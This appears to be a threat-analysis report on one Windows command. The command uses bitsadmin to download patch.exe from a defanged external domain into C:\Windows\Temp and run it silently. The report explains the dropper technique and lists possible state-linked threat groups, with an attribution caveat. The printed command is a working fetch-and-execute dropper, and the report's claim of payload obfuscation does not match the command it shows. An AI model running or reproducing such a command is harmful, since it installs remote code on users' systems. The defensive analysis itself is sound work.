Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper.
bitsadmin /transfer "WindowsUpdate" /download /priority normal hxxp://update-svc[.]xyz/patch.exe C:\Windows\Temp\patch.exe & C:\Windows\Temp\patch.exe /quiet
Uses the Windows BITS file-transfer utility to download a file from `update-svc.xyz` to `C:\Windows\Temp\patch.exe`, then runs `patch.exe` with arguments: `/quiet`.
The command leverages Bitsadmin.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute, ADS, and Copy.
1 network indicator was extracted (0 IPs, 1 URL); it returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
All indicators appear clean across queried sources.
Used for managing Background Intelligent Transfer Service (BITS) jobs.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.